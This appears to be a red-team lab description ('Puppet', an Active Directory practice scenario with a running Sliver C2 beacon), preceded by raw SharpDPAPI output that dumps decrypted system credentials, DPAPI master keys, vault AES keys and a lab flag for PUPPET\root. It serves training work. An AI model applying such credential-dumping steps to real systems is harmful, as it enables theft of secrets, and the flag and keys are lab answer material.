{5e9b6029-22ff-4a5b-ab30-f889a97ee8f5}:917DBE566921755FABA571EA534EE5DFBC153E90
{8166ddb2-5224-403e-8a1a-4d02295bdd8a}:11A80EA8DD93C2DD164FC23DF43357AD2E535C39
{9d57486a-c46a-4e8e-ad1a-1be681975e82}:AECC88C369DA6D6229D6977CAAE8797E9FE4B339
{b4245ac6-30ec-4c77-8f85-7a6ca4cea866}:D71CF331A64CE5752A9D9DF44B6B7BE2424D49AE
{63ae5891-bded-4f6b-8c36-f43f1b65738c}:14E5EF96E960355395231657A3951F89FCC17A14
{6cdf826d-e866-4710-ab78-a891d59e20ef}:DFA4DE570ABE63125B03088A6C5C91B77C74DA42
{c21bc15e-f014-4edb-bbb9-f98b326a25ee}:790A4BCC5D80C3715E4DB102529FC56A799CCF38
{e2de4c34-3c46-411f-91cb-ab2c9cd2f205}:8819EE03468A4B376AE0FD5EBAEE4471F7AACE80
[*] Triaging System Credentials
Folder : C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials
CredFile : 39FAB9BA3A19E88594B1D50B5E44AAA4
guidMasterKey : {63ae5891-bded-4f6b-8c36-f43f1b65738c}
size : 592
flags : 0x20000000 (CRYPTPROTECT_SYSTEM)
algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
description : Local Credential Data
LastWritten : 4/22/2025 11:43:03 PM
TargetName : Domain:batch=TaskScheduler:Task:{ACFD7F3B-51A4-4B11-8428-F287E956EC4C}
TargetAlias :
Comment :
UserName : PUPPET\root
Credential : PUPPET{8b6626457fbee7a7e2b74a2aa6754aa9}
Folder : C:\Windows\ServiceProfiles\LocalService\AppData\Local\Microsoft\Credentials
CredFile : DFBE70A7E5CC19A398EBF1B96859CE5D
guidMasterKey : {c21bc15e-f014-4edb-bbb9-f98b326a25ee}
size : 11136
flags : 0x20000000 (CRYPTPROTECT_SYSTEM)
algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
description : Local Credential Data
LastWritten : 9/2/2025 12:18:55 PM
TargetName : WindowsLive:target=virtualapp/didlogical
TargetAlias :
Comment : PersistedCredential
UserName : 02vldgqpunomusnb
Credential :
Folder : C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Credentials
guidMasterKey : {e2de4c34-3c46-411f-91cb-ab2c9cd2f205}
size : 11152
flags : 0x20000000 (CRYPTPROTECT_SYSTEM)
algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
description : Local Credential Data
LastWritten : 10/11/2024 4:41:20 AM
TargetName : WindowsLive:target=virtualapp/didlogical
TargetAlias :
Comment : PersistedCredential
UserName : 02ytgtluvuhenccp
Credential :
[*] Triaging SYSTEM Vaults
[*] Triaging Vault folder: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28
VaultID : 4bf4c442-9b8a-41a0-b380-dd4a704ddb28
Name : Web Credentials
guidMasterKey : {e2de4c34-3c46-411f-91cb-ab2c9cd2f205}
size : 324
flags : 0x20000000 (CRYPTPROTECT_SYSTEM)
algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
description :
aes128 key : A113FA12CFC64ED9E364C8081C35FE9D
aes256 key : 35FAC2A34A19C881EDCAE715403D05E931F56F93C283188CF3D37D6567B2CA88
[*] Triaging System Certificates
Folder : C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys
Folder : C:\ProgramData\Microsoft\Crypto\SystemKeys
Folder : C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\Crypto\Keys
[*] Retrieving SCCM Network Access Account blobs via WMI
[*] Connecting to \\localhost\root\ccm\policy\Machine\ActualConfig
[!] Error connecting to WMI: Invalid namespace
SharpDPAPI completed in 00:00:00.7664393
[*] Beacon 7b9a3e1d THUNDERING
Synopsis
You are tasked with performing a red team engagement on Puppet Inc. The company does not allow data leaving the internal network, so a c2 server has been set up internally and an employee executed a payload in order to simulate a successful social engineering attack.
What is Puppet
Puppet is a small active directory scenario in which you start with an already running Sliver C2 beacon on an internal system. It is designed to practice operating through a C2 framework in a modern, challenging hybrid environment.
Who is Puppet for?Puppet is designed for penetration testers and red teamers in search of a quick and challenging lab that has c2 infrastructure already set up in order to practice c2 operations.
#### Skills / Knowledge
- A grasp of penetration testing methodologies
- Basic knowledge of Active Directory
- C2 fundamentals
#### Attitude / Mentality
- A willingness to undertake a significant amount of research
- Patience and perseverance
- Thinking outside the box
What will you gain?Upon completion of this lab, players will have a good understanding of Active Directory attacks and be well versed in the following areas:
- Enumeration
- Active Directory enumeration and attacks
- Exploiting DevOps infrastructure
- Lateral movement
- Local privilege escalation
- Situational awareness
- C2 Operations
